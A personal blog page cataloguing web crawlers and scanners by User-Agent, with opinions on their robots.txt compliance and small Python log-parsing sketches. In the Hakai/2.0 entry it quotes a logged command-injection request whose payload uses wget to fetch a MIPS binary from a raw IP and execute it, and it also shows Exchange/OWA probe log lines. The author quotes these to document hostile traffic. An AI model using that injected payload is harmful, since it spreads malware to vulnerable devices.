I Reckon This Must be the Place, I Reckon

Musings and doxings on Robots

Notes On Robots

MRU: 22 August 2022

Go to the #thebotlist bookmark to skip the editorializing.

This page lists software (code, tools, programs) that reads (scans) multiple Websites.

Included is ALL automated code, whether a "Search Engine" or "malicious code" – I do not distinguish between the two. And there are many "in between" those two ends. If a classification were done, it might look like this:

  1. Search Engines – companies that index website content for people to search.
  2. Website Services – companies that index website content to sell services.
  3. White Hats – coders/people that index website exploits to list on their own website.
  4. Crackers – coders/people that just like (apparently) to break websites.

It's not "Hackers/Hacked", okay? The correct terms are "Crackers/Cracked". OKAY?

I block any robot that does not read robots.txt, all "Search Engine Optimization" services of any kind, and now all "White Hat" actors. I do this on principle. They, especially the latter two, ain't doing me any good (and they would use My Data for Their Ends only).
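How do I know who does and does not read robots.txt? I just look at the access log. A minimal sketch of the idea, in Python, assuming the usual Apache "combined" log format and a log file named access_log (both assumptions; adjust to your own setup):

#!/usr/bin/env python3
# Sketch: list User-Agent strings that never asked for /robots.txt.
# Assumes Apache "combined" log format and a file named access_log.
import re
from collections import defaultdict

LINE = re.compile(r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" \d+ \S+ "[^"]*" "(?P<ua>[^"]*)"')

seen = defaultdict(lambda: {"robots": False, "hits": 0})
with open("access_log", encoding="utf-8", errors="replace") as log:
    for line in log:
        m = LINE.search(line)
        if not m:
            continue  # malformed request lines, raw TLS bytes, and the like
        ua = m.group("ua")
        seen[ua]["hits"] += 1
        if m.group("uri").startswith("/robots.txt"):
            seen[ua]["robots"] = True

# Busiest non-readers first.
for ua, info in sorted(seen.items(), key=lambda kv: -kv[1]["hits"]):
    if not info["robots"]:
        print(f'{info["hits"]:6}  {ua}')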

Sometimes a Bot uses someone else's code to do their Bot Shit; code like zgrab and httpx for example. And some do their Bot Shit in total isolation (nobody writes about them) like ALittle Client, Hello, [Ww]orld and the new 0xAbyssalDoesntExist.

I do not block many known exploits. Why? I ain't got any exploitable code on my website! (More on why I can make that claim elsewhere.)

I do block some file requests known to be exploitable, such as any request with "wp" or "admin" in the URI, though just to reduce traffic.
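For flavor, that rule amounts to roughly the pattern below. This is a sketch in Python for illustration only; the real blocking lives in the server config, and the example URIs are just examples:

import re

# Illustrative only: refuse any request whose URI mentions "wp" or "admin".
BLOCK = re.compile(r"(wp|admin)", re.IGNORECASE)

for uri in ("/wp-login.php", "/adminer.php", "/notes/robots.html"):
    print(uri, "-> 403" if BLOCK.search(uri) else "-> serve")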

The Bot names here are usually the entire User-Agent string, but I might not always be exact. (Many do not adhere to any particular format, though "BotName/VERS; URL" is most common.)
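For the curious, here is a rough, best-effort parse of that common shape, sketched in Python. It is guesswork by design, and plenty of the UAs on this page will simply not match:

import re

# Rough, best-effort parse of the common "BotName/VERS ... URL" shape.
UA = re.compile(r"(?P<name>[A-Za-z0-9_.\- ]+?)/(?P<vers>v?[\d.]+).*?(?P<url>https?://\S+)?[);\s]*$")

for ua in ("Qwantify/1.0 +https://www.qwant.com/",
           "MJ12bot/v1.4.8 http://mj12bot.com/",
           "ALittle Client"):
    m = UA.search(ua)
    print(ua, "->", m.groupdict() if m else "no match")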

The order of the Robots listed here started (bottom up) randomly. Now the list grows top down, with the latest discovered first.

Other Resources

  1. https://raw.githubusercontent.com/matomo-org/device-detector/master/Tests/fixtures/bots.yml; A long list of Bot names and metadata.

Thebotlist

wp_is_mobile

I have been ignoring that one for a long time, as it's, well, I dunno. Just a run-o-the-mill Wordpress exploiter. So it's doxd here for S&G – wp_is_mobile log.

Qwantify/1.0 +https://www.qwant.com/

Does read robots.txt.

Why haven't I doxd this before? (I'm slow...)

"Wondering who uses Qwant? We do too."

X'lent! A search engine with a sense of humor!

"The search engine that doesn't know anything about you. Zero tracking of your searches. Zero sale of your personal data."

React.org

Does read robots.txt but does not adhere to it...

Calling themselves "The Anti-Counterfeiting Network":

"Supporting members in their anti-counterfeiting strategies by providing customs – online – and market enforcement services at non-commercial fees."

"To support activities to protect all rights holders, consumers and governments against the negative consequences of the trade in counterfeited goods."

RestSharp/107.3.0.0

Yet another HTTP library.

It's been trying for variations of "/adminer.php". WTF? And, lately, "/.git/config". frack

"Probably, the most popular REST API client library for .NET."

Okay. Yeah. Sure.

Screaming Frog SEO Spider/8.1

Just seen and only one request for root, so, we'll see...

Hakai/2.0

Just seen. An exploiter attacking "/login.cgi":

"/login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$"

Yes, a WTF?

serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)

Does read robots.txt. Seems to be a heavy reader.

"...crawls the web to add new links and track changes in our link database. We provide our users with access to one of the largest backlink databases on the market for planning and monitoring marketing campaigns."

Frack! Not another one! Oh, and really?:

"Does the bot crawl links with the rel = nofollow attribute? Yes, it scans."

RepoLookoutBot/1.0.0 (abuse reports to abuse@repo-lookout.org)

Does not read robots.txt. (And they identify as a Robot!)

"Repo Lookout is a large-scale security scanner, with a single purpose: Finding source code repositories, that have been accidentally exposed to the public and reporting them to the domain’s technical contact."

Tried every directory for ".git" shit. Yet another useless "We are here to help" bandwidth waster. ("Directory" being like "/word/" in a URL, and they try "/word/.git/HEAD", etc.)

project_patchwatch

Does not read robots.txt. Been doing these:

"\x16\x03\x01" 404
"GET / HTTP/1.1" 200

(That "\x16\x03\x01" is the start of a TLS handshake aimed at the plain HTTP port, by the way.)

"...group of students at Esslingen University scanning the internet to gain insights into network security. If u want us to stop scanning your IP range, get in touch with us [email]..."

robots.txt! ROBOTS.TXT! ROBOTS DOT TEXT!!! sheesh

InfoTigerBot/1.9 +https://infotiger.com/bot

Does read robots.txt.

The "Independent, privacy respecting search engine". Looks very... inviting.

"More than 30 years after the World Wide Web first saw the light of day at CERN, only very few search giants determine the results of all of our web search."

Wow.

"... we neither collect user data nor do we track users. For us – a matter of course."

Cool. In fact, they look like a "Very Good Thing!" (I never make recommendations, but InfoTiger merits a very close looking into.)

Applebot/0.1 +http://www.apple.com/go/applebot

Does read robots.txt.

Why haven't I seen these guys before? Weird. They can't be new.

SeznamBot/3.2 +http://napoveda.seznam.cz/en/seznambot-intro/

Does read robots.txt.

"Seznam.cz is a Czech on-line company running, besides other services, the web portal Seznam.cz, which is the first place of choice for millions of Internet users from the Czech Republic."

Okay.

BW/1.1 bit.ly/2W6Px8S

Does read robots.txt.

"The BuiltWith system visits a website to determine the technology profile it is using by looking at the publicly visible code on a website."

"Millions of people benefit from understanding how websites are built using BuiltWith's free technology profile lookup tool."

While that seems like BS, I'll give them the benefit of the doubt as they play nice.

yacybot http://yacy.net/bot.html

Does read robots.txt.

"YaCy is free software for your own search engine."

Interesting. But they have requested only a single URI here, and one that has been gone for years (but one that is still linked to on some websites...).

0xAbyssalDoesntExist

Only POSTs to "/editBlackAndWhiteList" which is maybe a hardware CVE or something.

That URL/URI can be seen in this code: raw.githubusercontent.com/mcw0/PoC/master/TVT-PoC.py, which is some kind of Exploit code...

And, of course, it can be found in many a Website's online Server Logs. (Why do people do that? It serves no purpose. sigh)

The website greynoise.io lists this several times – but looking at their meta data results in more confusion.

httpx Open-source project (github.com/projectdiscovery/httpx)

Does not read robots.txt.

What they say:

"httpx is a fast and multi-purpose HTTP toolkit allows to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads."

Okee fine. But why are you reading my stupid little website? Oh, and what they say? Smells like plain ol' horse hockey pucks.

NihilScio Educational search engine - +https://www.nihilscio.it/NihilScio.htm

Seen just three times, three days in March... They are what they say they are.

dwf-web-archive

Since seen only twice and for an outdated link, this might not be a robot. And nobody else has that string in any webpage... I'll keep it here for S&G.

NsToolsBot/analyse

Does read robots.txt.

Only 5 hits this year. Another "can't be found by Web Search" Bot. (Why, really, do people place web server logs in the public sphere? It makes zero sense.)

Bytespider https://zhanzhang.toutiao.com/

Does read robots.txt. Aka ByteDance.

I can't read Mandarin...

CATExplorador/1.0beta (sistemes at domini dot cat; https://domini.cat/catexplorador/)

Does not read robots.txt. But only seen a few times this month. Spain.

fluid/0.0 +http://www.leak.info/bot.html

Does read robots.txt.

An "Internet Marketing Research" company. I (do) like how they say of their Web hosting company: "The people there are wise and nice."

serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)

Does read robots.txt.

"We provide our users with access to one of the largest backlink databases on the market for planning and monitoring marketing campaigns."

Huh? What's a backlink? Wait. Don't tell me. I don't want to know.

HTTP Banner Detection (https://security.ipip.net)

Does not read robots.txt. Only reads "/".

"For network security research, we need to obtain the IP location Banner and fingerprint information, we detecting the common port openly or not by ZMap, and collecting opened Banner data by our own code. Any questions please do not hesitate to contact with us: frk@ipip.net."

Ok. But not! [A Chinese company that needs a better English translator.]

go-resty/2.6.0 (https://github.com/go-resty/resty)

Does not read robots.txt. Aka MAndroid.

Only reads "/". (Likes to give HEAD.)

Two in one! First seen March, 2022. HEAD with the "go-resty", followed immediately by a GET with "MAndroid". WTF? Just seen so I'll wait for more before wasting my time on them.

Fuzz Faster U Fool v1.3.1

Does not read robots.txt, but, since the code is a tool "to discover potential vulnerabilities", they will say, "We are not a Spider, Luser..."

On Github.

Nmap Scripting Engine https://nmap.org/book/nse.html

Great. Nmap has a Scripting Engine. (The NSE ain't new; it's just that someone using it has decided to tell us that he/she/they has/have automated it and it found this stupid little website. sigh)

Oh, see https://nmap.org/p51-11.html for how it started.

webprosbot/2.0 (+mailto:abuse-6337@webpros.com)

Does not read robots.txt.

What they say:

"WebPros delivers the most innovative technologies to enable the digital world. We bring together products and solutions to enable businesses to build, operate, and grow online. Our products help manage servers, websites, billing, and online marketing."

Not another one!

They say their brands include cPanel and Plesk. But why are they automating reading other people's websites?!?!

Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)

Does not read robots.txt.

Dalvik is the Android runtime, a Java-style virtual machine (as most search results indicate). That is as far as I went in research. (Slowly seeing more from them.) Why I initially placed it here was that the UA is formatted as if a Robot...

Mozilla/5.0 (compatible; Wappalyzer)

Does not read robots.txt.

What they say:

"Find out the technology stack of any website. Create lists of websites that use certain technologies, with company and contact details. Use our tools for lead generation, market analysis and competitor research."

Way cool! (Not.) More bandwidth wasting. sigh

deepnoc https://deepnoc.com/bot

Does read robots.txt.

Some kind of search engine "helper" or something; but looks interesting.

Pandalytics/1.0 (https://domainsbot.com/pandalytics/)

Does read robots.txt.

What they say:

"The most ccTLD-friendly Name Suggestion on the market. DomainsBot’s name suggestion is optimized to help meet your customers’ demand for local domains."

"Get a full picture of the domain and hosting market, discover better business opportunities and generate higher revenue."

Such dredge! Yet another waste of bandwidth.

Project-Resonance (http://project-resonance.com/)

Does not read robots.txt.

What they say:

"Internet wide surveys to study and understand the security state of Internet as well as facilitate research into various components / topics which originate as a result of our surveys."

Aw fuck. Yet another "White Hat" trying to protect me from myself. sigh

Further self-justifuckencation shit from them:

"You are visting this page most probably because you saw this url in your logs. Well, nothing to worry. So, what Happened?"

"You recieved a [sic] innocent HTTP request from one of our distributed research engine as a part of Project Resonance. We perform internet-wide security research and send non-malicious and non-intrusive requests for the same. We take special care of making sure no systems are negatively affected because of our scans."

I like (not) how they use the word "innocent".

And then there is this:

"And if you would not like any of our further probes, please drop us an email at [email protected]. Please make sure that you include the list of IP Addresses / IP Ranges which you would like to get excluded. Once we hear from you, we will simply put your IP Ranges on our exclusion list and you will never see any probe from us."

No, there is something called the "Robots Exclusion Standard". (And the "[email protected]" thing means THEY DO NOT WANT TO BE SCANNED NEEDLESSLY! Needs Javascript enabled to display the address. It's a Cloudflare /cdn-cgi/l/email-protection thing...)

Not needed. Not wanted. Thank you very much. Go the fuck away!
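For any bot author still confused: the Robots Exclusion Standard is not hard, and Python even ships a parser for it in the standard library. A minimal sketch, with a made-up robots.txt and a made-up bot name (both purely hypothetical):

from urllib import robotparser

# Hypothetical robots.txt content and bot name, purely for illustration.
rules = [
    "User-agent: ExampleResearchBot",
    "Disallow: /",
]

rp = robotparser.RobotFileParser()
rp.parse(rules)

# A compliant crawler asks this BEFORE every single fetch.
print(rp.can_fetch("ExampleResearchBot", "https://example.org/anything"))  # False
print(rp.can_fetch("SomeOtherBot", "https://example.org/anything"))        # True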

archive.org_bot http://archive.org/details/archive.org_bot

Does read robots.txt.

This is the "Internet Archive" bot; aka "Wayback Machine".

ArchiveTeam ArchiveBot/20210517.c1020e5 (wpull 2.0.3)

Does not read robots.txt. They will claim that they are not a spider, but they are.

What they say:

"HISTORY IS OUR FUTURE"

"And we've been trashing our history."

Really?!?! (But actually, WTF does that even mean?!?!)

"Archive Team is a loose collective of rogue archivists, programmers, writers and loudmouths dedicated to saving our digital heritage."

They have much more to brag about... They also say, via their wiki:

"ArchiveBot is an IRC bot designed to automate the archival of smaller websites (e.g. up to a few hundred thousand URLs). You give it a URL to start at, and it grabs all content under that URL, records it in a WARC file, and then uploads that WARC to ArchiveTeam servers for eventual injection into the Internet Archive's Wayback Machine (or other archive sites)."

So, how did they get to my pathetic, always changing, stupid little website? My shit does not need these kinds of "services", thank you very much.

DuckDuckGo-Favicons-Bot/1.0 http://duckduckgo.com

I've been blocking all favicon draggers for a long time. (How they got to my website is a longer story, not yet finished...)

masscan/1.3 (https://github.com/robertdavidgraham/masscan)

Does not read robots.txt. But they will say, "We are not a spider, Luser."

They do say they are a "TCP port scanner" that:

"... spews SYN packets asynchronously, scanning entire Internet in under 5 minutes."

Sounds cool. Not.

And why me? Oh...

"It can also complete the TCP connection and interaction with the application at that port in order to grab simple "banner" information."

Scanners! Analizers! SEOs! Oh my! When are these fucking people going to stop! Not necessary here! Stop stealing my bandwidth! Stop slowing the Internets to a crawl!

Gather Analyze Provide https://gdnplus.com

Does not read robots.txt.

"Global Digital Network Plus scours the global public internet for data and insights. To accomplish this, GDNP sends packets to all IPv4 IP addresses. While far within legal boundaries, sometimes our benign research initiatives are mistaken for malicious network reconnaissance. If you are interesting in removing your organization’s IP space from within our scope, please send us an email at contact@gdnplus.com."

I have to ask you to remove my "organization’s IP space from" your scope? Oh, please.

ThinkChaos/0.3.0 In_the_test_phase,_if_the_ThinkChaos_brings_you_trouble,_please_add_disallow_to_the_robots.txt._Thank_you.)

Does not read robots.txt (kind of ironic, donchta think?).

zgrab/0.x

Does not adhere to robots.txt. (I am positive, that if you ask them, they will say, "We are not a spider, Luser"...)

From their gitshit, I mean github:

"ZGrab is a fast, modular application-layer network scanner designed for completing large Internet-wide surveys. ZGrab is built to work with ZMap (ZMap identifies L4 responsive hosts, ZGrab performs in-depth, follow-up L7 handshakes). Unlike many other network scanners, ZGrab outputs detailed transcripts of network handshakes (e.g., all messages exchanged in a TLS handshake) for offline analysis."

That's a huge WTF as all of that is technobabble.

From https://linuxsecurity.expert/tools/zgrab/:

"ZGrab is commonly used for penetration testing, security assessment, or vulnerability scanning. Target users for this tool are pentesters."

Okay, but why my website? And here's the shit they requested this month (most root requests removed):

192.241.211.247 - - [21/Dec/2021:01:08:42] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
192.241.213.212 - - [21/Dec/2021:01:19:58] "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
192.241.210.245 - - [21/Dec/2021:16:56:06] "GET /login HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
192.241.214.219 - - [21/Dec/2021:22:48:36] "GET /owa/auth/logon.aspx HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
192.241.212.44 - - [21/Dec/2021:22:52:41] "GET /owa/auth/x.js HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
192.241.213.164 - - [21/Dec/2021:22:56:24] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
192.241.211.102 - - [21/Dec/2021:23:37:55] "GET /actuator/health HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"

Not exactly looking like "good guys," eh?

CensysInspect/1.1 +https://about.censys.io/

Does not adhere to robots.txt.

What they say:

"Your cloud is bigger, wider, and more vast than you know; your internet assets innumerable. Censys is the proven leader in Attack Surface Management by relentlessly searching and proactively monitoring your digital footprint far more broadly and deeply than ever thought possible."

They go on with their bullshit:

"Censys ASM provides a comprehensive profile of the IT assets on the internet, we empower defenders....."

Two things: Who are they fooling and why do they access my pathetic little website?

They also do a request without a user agent string, which is a 400. Then they immediately make a request with their UA; which gets 'em a 403...

Linux Gnu (cow)

Does not adhere to robots.txt, but probably not a spider...

Just gets root about 20 times per month, from two IP addresses.

Funny, since first seen months ago, no one seems to have written about this... Whatever it is.

(But one will see many "hits" as oh so many people/sites make their server log files public. Why would anyone do that? Who/What does that help?)

Oh, here's one other hit: https://threat.gg/attackers/9afa91cc-e147-4527-b487-7e290a184f92. But that page, while their Website is really well designed, simply displays a single request's data as JSON; it's lamer than this...

Linespider/1.1 +https://lin.ee/4dwXkTH

Does adhere to robots.txt. (Redirects to https://help2.line.me/linesearchbot/web/.)

"Linespider is a Web crawler that provides a wide range of search results for LINE services..."

WTF is/are "LINE services"? Then I realized that lin.ee/ is the Bot link for line.me/, a Japanese messaging App.

"LINE has grown into a social platform with hundreds of millions users worldwide, having a particularly strong focus in the rapidly advancing continent of Asia."

Why they need a Bot, though, they do not say.

Baiduspider/2.0 +http://www.baidu.com/search/spider.html

Does not adhere to robots.txt.

While sometimes called the "Google of China," they are very annoying: not only do they not read robots.txt, they also sometimes mis-identify themselves.

FlfBaldrBot/1.0

Does not adhere to robots.txt.

I almost missed this one. It was in the "ssl_log" log file for last month... A duckduckgo search resulted in:

Not many results contain flfbaldrbot
debilsoft IP-Logger PRO Web analytics
[Search domain debilsoft.de] debilsoft.de/ip_logger_pro/iplog_us.php?action=show
[MAP] [Wiki] United States. 64.227.120.48. FlfBaldrBot/1.0.

No more results found for FlfBaldrBot.

Funny thing about the one hit – "IP-Logger PRO; visitor data & web analystics" – it is dynamically generated so my visit did not see that bot in their logs. debilsoft's logger page is well formed and easy to read. Kinda nice.

NetSystemsResearch netsystemsresearch.com

Does not adhere to robots.txt.

Their UA is the actual string below.

"NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com."

From their main page:

"Net Systems Research is an independent research organization focusing on a range of topics in internet security including IoT Proliferation, Zero Trust Networking, Network-Level Security, Cyber Risk Modeling and External Network Security Measurement. We focus on surveying and analyzing real world network systems to better understand and study challenging internet security problems. Through our research, we hope to improve the current understanding of the global internet’s security and promote better network security practices."

Wow! That's bold! But is it just marketing bullshit? You betcha!

What really bugs me about these kinds of "We are here to help!" websites is:

  1. They do not adhere to the robots.txt standard – it's a "Standard."
  2. They say "If you would like your IP ranges or domains to be excluded from our studies, please contact us at abusedepartment@netsystemsresearch.com with the IP ranges and/or domains and any associated ownership information that is relevant to processing your request."
  3. Number 2 is a big "Fuck You, you arrogant jerks," from my view. I run static, non-service websites, and I do not need anyone's "help" to run them.
  4. Since they do not adhere to such a basic web standard as robots.txt, how can they be trusted for anything?

DataForSeoBot/1.0 +https://dataforseo.com/dataforseo-bot

Does adhere to robots.txt. A pay-for SEO service.

From their main page:

"Powerful API Stack For Data-Driven Marketers."

"We provide comprehensive SEO and digital marketing data solutions via API. Everything your SEO software requires — in one place."

Ah, no.

InfoTigerBot/1.9 +https://infotiger.com/bot

Does adhere to robots.txt.

Search engine.

"Independent, privacy respecting search engine... A text only search engine, covering two languages (English+German)."

ZoominfoBot (zoominfobot at zoominfo dot com)

Adheres to robots.txt.

From their main page:

"Don’t just go to market, own your market."

"Accelerate your pipeline with ZoomInfo’s portfolio of solutions that combine B2B intelligence & company contact data with engagement software, and dynamic workflows."

"Uncover opportunities within your market by understanding how to engage active buyers."

"Pump the richest B2B data into your tech stack or take advantage of ZoomInfo’s fully-loaded suite of applications to reach your buyers faster."

From their FAQ:

"ZoomInfo is used by salespeople, marketers, and recruiters to optimize their lead generation efforts by providing them access to a vast business contact database and numerous sales intelligence and prospecting tools."

Who buys this dredge...

Twingly Recon-Klondike/1.0 (+https://developer.twingly.com)

Does not read robots.txt.

A Search API:

"Twingly Blog Search API is a commercial XML over HTTP API that enables machine access to Twingly’s blog search index."

It is very interesting. From their Terms of Use:

"Twingly is a Search Engine for Conversational Media such as Blogs. Our API and Widgets are free for personal use, and we offer paid licenses for commercial use. You can use Twingly Widgets without registering, but in doing so you accept these terms of use."

But they do not seem to have any – as my logs show – support for robots.txt. Their main page is full of dredge like:

"We keep track of updates from millions of online sources like blogs, forums, news, etc. Our focus is a broad coverage that includes all significant sources in each country. Through our easily integrated APIs, you get access to all that social data at your fingertips!"

My fingers just blocked you!

Mail.RU_Bot/2.0 +http://go.mail.ru/help/robots

Adheres to robots.txt.

They have been around for a long time. And I have no idea what they do.

DotBot/1.2 +https://opensiteexplorer.org/dotbot; help@moz.com

Does adhere to robots.txt.

Redirects to https://moz.com/link-explorer, which says:

"Enter the URL of the website or page you want to get link data for. Create a Moz account to access Link Explorer and other free SEO tools. Get a comprehensive analysis for the URL you entered, plus much more!"

I think not! Plus much more!

Googlebot/2.1 +http://www.google.com/bot.html

I no longer use Google for searches. Hover over their generated links and Google LIES! They do not reflect the true URL, as all of them go directly to Google with a ton of META data they use to track you before redirecting to the actual result. That is DISHONEST.

CCBot/2.0 https://commoncrawl.org/faq/

Adheres to robots.txt.

"We build and maintain an open repository of web crawl data that can be accessed and analyzed by anyone."

hrankbot/1.0 +https://www.hrank.com/bot

Does not read robots.txt.

"Which web hosting is better? We rank 300 Shared Web Hosting Providers by Uptime, Response Time and other features. Now we know for sure!"

Yer blocked fer sher!

Barkrowler/0.9 +https://babbar.tech/crawler

Adheres to robots.txt.

"Using Babbar, SEO gets easier."

"Thanks to Babbar’s data and metrics, uncover the strengths and weaknesses of your site and its competitors."

"Babbar helps you set up truly effective link building strategies thanks to its understanding of link and page semantics."

sigh Where do these people come from? Marketing 101 I guess. (Which just means the BS is good looking.)

ips-agent

Adheres to robots.txt.

No one seems to know who/what they are. Verisign hosted. Many "IPS Insurance Agent" related pages. Could also mean Intrusion Prevention Systems. It's a WTF?

MegaIndex.ru/2.0 +http://megaindex.com/crawler

Does, and does not, adhere to robots.txt.

Web Search.

[18/Oct/2021:23:47:20] "GET / HTTP/1.1" 200 11585 "-" "Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"
[18/Oct/2021:23:47:22] "GET /robots.txt HTTP/1.1" 200 26 "-" "Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"

They get the root page and THEN get robots.txt. WTF? (But that could be an Apache thing.)

SEOkicks +https://www.seokicks.de/robot.html

Does adhere to robots.txt.

Ditto.

Adsbot/3.1 +https://seostar.co/robot/

Does adhere to robots.txt.

I have zero need, and less tolerance for, "SEO" Bots and their shady services.

Sogou web spider/4.0 (+http://www.sogou.com/docs/help/webmasters.htm#07

Does adhere to robots.txt.

Dataprovider.com

Does, and does not, adhere to robots.txt. Again, why get root and THEN get robots.txt?

[18/Oct/2021:09:48:07] "GET / HTTP/1.1" 200 11585 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
[18/Oct/2021:09:48:10] "GET /robots.txt HTTP/1.1" 200 26 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"

(I did think Apache "log ordering issues", but off by three seconds? I don't know.)

More dredge:

"Dataprovider.com transforms the internet into a structured database of web data. Our technology produces rock-solid insights today to empower your decisions for tomorrow."

"Start your free trial"

No thanks.

AhrefsBot/7.0 +http://ahrefs.com/robot/

Does adhere to robots.txt.

An SEO service for paying customers to keep tabs on their own websites. Therefore, they have no reason to crawl my websites.

"ahrefs is an All-in-one SEO toolset, with free Learning materials and a passionate Community & support"

"AhrefsBot is a Web Crawler that powers the 12 trillion link database for Ahrefs online marketing toolset. It constantly crawls web to fill our database with new links and check the status of the previously found ones to provide the most comprehensive and up-to-the-minute data to our users.

"Link data collected by Ahrefs Bot from the web is used by thousands of digital marketers around the world to plan, execute, and monitor their online marketing campaigns."

DomainStatsBot/1.0 (https://domainstats.com/pages/our-bot)

Does adhere to robots.txt.

Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7143; Pro)

Does not read robots.txt.

Seen last week for the first time and just one GET / HTTP/1.1. Weird.

Expanse https://expanse.co/

Does not read robots.txt.

This is their new UA:

"Expanse indexes customers’ network perimeters. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com."

Was recently this:

"Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com"

And first seen as this:

"Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

Wow and WTF!

(I like how badbot.itproxy.uk says: "I'm not one of their customers, so why are they all over my websites like a rash?")

Oh, and their website says Expanse "protects around 10% of the overall Internet."

Yeah, right...

ALittle Client

Does not adhere to robots.txt.

All requests are for Wordpress exploits.

ThinkChaos/0.3.0 +In_the_test_phase,_if_the_ThinkChaos_brings_you_trouble,_please_add_disallow_to_the_robots.txt._Thank_you.

Does not adhere to robots.txt despite what it says.

Gets just "/" so far. Has footprints on the web as a developer(s) on Github and Stack Overflow. Saw this: "I just noticed a new user-agent string called ThinkChaos out of Tencent IP..."

A WTF as far as I can see.

SemrushBot/7~bl +http://www.semrush.com/bot.html

Does adhere to robots.txt.

This is a weird one. Just gets a few pages over and over all month long, using an ill-formed URL. Still trying even after a few weeks of 404's.

PetalBot +https://webmaster.petalsearch.com/site/petalbot

Does adhere to robots.txt.

A search engine owned by Chinese telecom Huawei.

MJ12bot/v1.4.8 http://mj12bot.com/

Does adhere to robots.txt.

BLEXBot/1.0 +http://webmeup-crawler.com/

Does (lately not) adhere to robots.txt. Pay for SEO...

"The BLEXBot crawler is an automated robot that visits pages to examine and analyse the content, in this sense it is similar to the robots used by the major search engine companies."

Um, okay, but:

"BLEXBot assists internet marketers to get information on the link structure of sites and their interlinking on the web, to avoid any technical and possible legal issues and improve overall online experience. To do this it is necessary to examine, or crawl, the page to collect and check all the links it has in its content."

Not mine.

MojeekBot/0.10 +https://www.mojeek.com/bot.html

Does adhere to robots.txt.

Bytespider https://zhanzhang.toutiao.com/

Does adhere to robots.txt.

Since it is all in Mandarin, I can't tell what they do.

The phpbb.com community does not like this one.

SEOkicks +https://www.seokicks.de/robot.html

Does adhere to robots.txt.

What they say:

"SEOkicks continuously collects link data with its own crawlers and makes them available via website, CSV export and API. The current index comprises more than 200 billion link data records."

Yawn.

DotBot/1.2 +https://opensiteexplorer.org/dotbot

Does adhere to robots.txt. Redirects to https://moz.com/link-explorer.

"Your All-In-One Suite of SEO Tools The essential SEO toolset: keyword research, link building, site audits, page optimization, rank tracking, reporting, and more."

Yeah, whatever. But, ah... Why?

YandexBot/3.0 +http://yandex.com/bots

Does adhere to robots.txt.

Search Engine

"Yandex is a technology company that builds intelligent products and services powered by machine learning. Our goal is to help consumers and businesses better navigate the online and offline world. Since 1997, we have delivered world-class, locally relevant search and information services. Additionally, we have developed market-leading on-demand transportation services, navigation products, and other mobile applications for millions of consumers across the globe."